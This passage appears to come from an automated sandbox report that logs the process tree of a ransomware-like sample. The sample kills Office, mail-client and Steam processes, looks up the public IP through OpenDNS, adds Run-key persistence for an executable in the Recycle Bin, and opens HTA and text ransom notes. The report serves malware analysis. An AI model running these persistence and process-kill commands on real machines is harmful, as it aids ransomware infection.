- Kills process with taskkill
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe3⤵
- Kills process with taskkill
PID:1784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe3⤵
- Kills process with taskkill
PID:1692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe3⤵
- Kills process with taskkill
PID:1772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe3⤵
- Kills process with taskkill
PID:1380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe3⤵
- Kills process with taskkill
PID:284
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe3⤵
- Kills process with taskkill
PID:916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe3⤵
- Kills process with taskkill
PID:556
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe3⤵
- Kills process with taskkill
PID:296
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe3⤵
- Kills process with taskkill
PID:1304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe3⤵
- Kills process with taskkill
PID:1584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe3⤵
- Kills process with taskkill
PID:1456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵PID:1056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵PID:1352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com2⤵PID:612
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵PID:324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f® delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f2⤵PID:1460
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f3⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f3⤵
- Modifies registry key
PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f® add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f2⤵PID:1968
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:896
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f3⤵
- Adds Run key to start application
PID:1104
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ReadMe_Now!.hta"2⤵
- Modifies Internet Explorer settings
PID:1204
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Documents and Settings\Admin\Desktop\ReadMe_Now!.hta"2⤵
- Modifies Internet Explorer settings
PID:1724
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:960
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x1c01⤵PID:1692
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Read_Me!_.txt1⤵PID:860